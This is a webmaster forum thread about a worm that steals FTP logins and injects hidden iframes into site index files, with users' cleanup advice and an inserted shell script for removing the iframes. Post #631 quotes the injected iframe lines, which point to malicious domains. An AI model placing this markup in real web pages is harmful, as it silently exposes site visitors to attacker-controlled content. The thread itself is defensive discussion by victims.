  1. #631
    Hellas
    Quote: Originally Posted by DomainMagnate
    Hellas, what does the worm do?
    First your PC gets infected. Then it watches for your username and pass for FTP (I believe it gets them when you initiate a connection, not when you type them in).
    Then it adds a few lines to every file on the server that contains index or main in its name,
    but I found it in some unrelated files. Those files are pointed to some Chinese or other sites' ads or something, not sure.

    Here are the lines it adds:

    echo "<iframe src=\"http://goooogleadsence.biz/?click=B16BFB\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

    echo "<iframe src=\"http://google-ana1yticz.com/?click=38951B\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

    and another one
    <iframe src="http://cutlot.cn/in.cgi?income49" width=1 height=1 style="visibility: hidden"></iframe>

    I have one big site with over 600 index files, and I am still looking for a way to remove them all. WordPress sites are very easy to clean, but I noticed it infects a few other sites, not just index. Some guys on Joomla are selling removal tools. My Clam antivirus detects them all on the server but it cannot repair files, just delete them, so you need to manually remove those.

    And it looks like permissions did not stop him. Every file that I (my FTP user) had the right to write to is infected.

    The bad thing is, if you don't react, Google will designate your site as "This site can harm your computer". You can imagine what that would do to your site traffic.

  2. #632
    I'm fed up with cleaning them. It has infected most of my sites. And it looks like.. the only job is to clean clean clean.. damn.. leave everything and clean this..

    Quote: Originally Posted by Hellas
    Today 5 of my sites got infected by the iframe FTP worm,
    and among them sulumits retsambew.
    I changed all my passwords and cleaned almost all...
    lost over 7 hours to fix them all...

    I see Sunitas entry is still infected. This worm is madness. I would strangle the guy who made it, even if I know that I am the most guilty for not being more careful.
    I was lucky to notice almost immediately that something was wrong...

    Afzal, it was some other directories; I will check it when I log back into Windows.
    But I think they were regular directories...

  3. #633
    DomainMagnate
    Ouch! Well, I usually just roll back to the previous backup when the sites get hacked.

  4. #634
    Hellas
    Quote: Originally Posted by ChillingBreeze
    I'm fed up with cleaning them. It has infected most of my sites. And it looks like.. the only job is to clean clean clean.. damn.. leave everything and clean this..
    You need to clean your PC first, then change all passwords, then bring back your backups.
    There is no point in recovering if you did not change backup; it will just infect everything again.

    Quote: Originally Posted by DomainMagnate
    Ouch! Well, I usually just roll back to the previous backup when the sites get hacked.
    That is what I did in small cases.

    Also, the strange thing is that I don't use FTP so often. But I use FTP layers in my PHP applications... So that's why I am worried that it can watch for everything typed in.
    So I changed all my system passwords.

    And as I said, I was lucky to notice almost immediately. My friend contacted me and said he was getting unusual warnings, and just a little bit earlier everything worked.

    I now work from my Mandriva installation; I don't trust the XP + NOD 32. However, NOD 32 notified me and I mistakenly clicked close instead of terminate.

    Also, this thing works only on some browsers:

    IE, Firefox and Opera; it looks like it can't infect Chrome.

  5. #635
    You could use sed along with find to remove all instances of those lines in a whole directory structure, if you have access to run sed/find (shell).
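The find/sed cleanup suggested in the post above, written out as an added example that is not part of any post in this thread. The pattern is derived from the three injected lines quoted in post #631; the function names `list_infected` and `clean_tree` are hypothetical, and it assumes the injected tag sits on a line of its own, as in those quoted lines.

```shell
#!/bin/sh
# Added example (not from the thread). Function names are hypothetical.
# Assumes find, grep -E and sed -E are available on the server.

# A 1x1 iframe hidden with visibility:hidden, as in the quoted lines.
# \\? allows the \" escaping used by the PHP echo form.
IFRAME='<iframe src=\\?"https?://[^"\\]+\\?" width=1 height=1 style=\\?"visibility: ?hidden[^>]*></iframe>'

# The same tag alone on its line, optionally wrapped in echo "...";
# [[:space:]] also absorbs the \r of files uploaded with CRLF endings.
WHOLE_LINE="^[[:space:]]*(echo \")?${IFRAME}(\";)?[[:space:]]*\$"

# list_infected DIR: print every PHP/HTML file under DIR containing the tag.
list_infected() {
    # grep exits 1 when nothing matches; that is not an error here.
    find "$1" -type f \( -name '*.php' -o -name '*.htm' -o -name '*.html' \) \
        -exec grep -lE "$IFRAME" {} + || true
}

# clean_tree DIR: keep FILE.infected as a copy of each hit, delete only the
# lines that are nothing but the injected tag, then print the files that
# still match (tag shares a line with real content) for manual review.
clean_tree() {
    list_infected "$1" | while IFS= read -r f; do
        cp -p "$f" "$f.infected" || continue
        sed -E "\\#${WHOLE_LINE}#d" "$f.infected" > "$f"
    done
    list_infected "$1"
}

# Usage: list_infected /path/to/docroot ; clean_tree /path/to/docroot
```

Any path `clean_tree` still prints has the iframe mixed into a line with other content and is left unchanged for hand editing. Move the `.infected` copies out of the web root once the cleanup has been checked.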

  6. #636
    Shawn
    What browser did you use to open the infected site and what anti-virus are you running?

  7. #637
    My sulumits retsambew blog is lucky that it has not been affected by any virus. My WordPress blog also got suspended.

  8. #638
    Coastercraze
    Quote: Originally Posted by sulumits competitior
    My sulumits retsambew blog is lucky that it has not been affected by any virus. My WordPress blog also got suspended.
    Mr. Sulumits Retsambew has made its way to the first page finally.

  9. #639
    Hellas
    Quote: Originally Posted by nux
    You could use sed along with find to remove all instances of those lines in a whole directory structure, if you have access to run sed/find (shell).
    I used Clam antivirus to locate all instances, then manually removed them...
